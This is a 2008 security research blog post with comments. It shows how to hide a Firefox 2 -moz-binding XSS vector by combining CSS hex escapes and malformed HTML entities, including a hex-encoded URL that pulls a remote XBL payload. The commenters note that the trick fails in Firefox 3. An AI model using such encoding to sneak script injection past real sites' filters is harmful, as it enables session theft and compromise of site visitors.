Moz-binding XSS fun
Monday, 4 February 2008
CSS supports hex encoding within styles as well html entities, but did you know you could combine them both? I didn’t. To construct an attack similar to the one displayed below you first need to convert your CSS property to hex, so -moz-binding becomes: \2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67, notice there is no “x” prefix or double zeros like you would see in HTML entities or Unicode Javascript. The link contains a Hackvertor URL to help you with the conversion.
You can do the same conversion on the value of the property, so the url of the moz-binding payload: //businessinfo.co.uk/labs/xbl/xbl.xml#xss becomes : \2f\2f\62\75\73\69\6e\65\73\73\69\6e\66\6f\2e\63\6f\2e\75\6b\2f\6c\61\62
\73\2f\78\62\6c\2f\78\62\6c\2e\78\6d\6c\23\78\73\73
I hope you’re following so far, we can now take the property string and encode it further, crazy eh? Any part of the property can now be encoded with html entities. I went for the backslash and malformed entities but you can experiment with different combinations. The property “\2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67” now becomes: 尭屭屯屺尭屢屩&
#x5c6e層屩屮屧.
Here is the final vector with a link to hackvertor for testing:-
The final vector
No. 1 — February 4th, 2008 at 2:55 pm
interesting, I quickly checked the method in Firefox 3 and it doesn’t seem to work. I haven’t checked it in Firefox 2 though.
No. 2 — February 4th, 2008 at 3:21 pm
Yep only tested in Firefox 2, although other tricks may be possible with FF3, I might have a go at that some other time 🙂
No. 3 — February 4th, 2008 at 3:24 pm
Another thing I forgot to mention is that noscript silently disables moz-binding, so you have to disable noscript to test the vector.
No. 4 — February 5th, 2008 at 4:07 am
error console in FF3:
Warning: Unknown property ‘å°Âå±Â屯屺å°Â屢屩屮層屩屮屧’. Declaration dropped.
Though I think FF3 enforces SOP on -moz-binding now anyway, right?
No. 5 — February 5th, 2008 at 9:26 am
@riahmatic
Yep that’s the expected behavior but FF2 seems to read the entities first and decode them but for some reason only takes into account the first few characters (maybe because it’s in a style).
I’ve not looked at FF3 yet much but I’m sure to have plenty of fun when I do 🙂 If FF3 does enforce SOP on moz-binding then that’s a good thing but I’ve not seen it mentioned anywhere.
No. 6 — February 6th, 2008 at 1:57 am
awesome! 🙂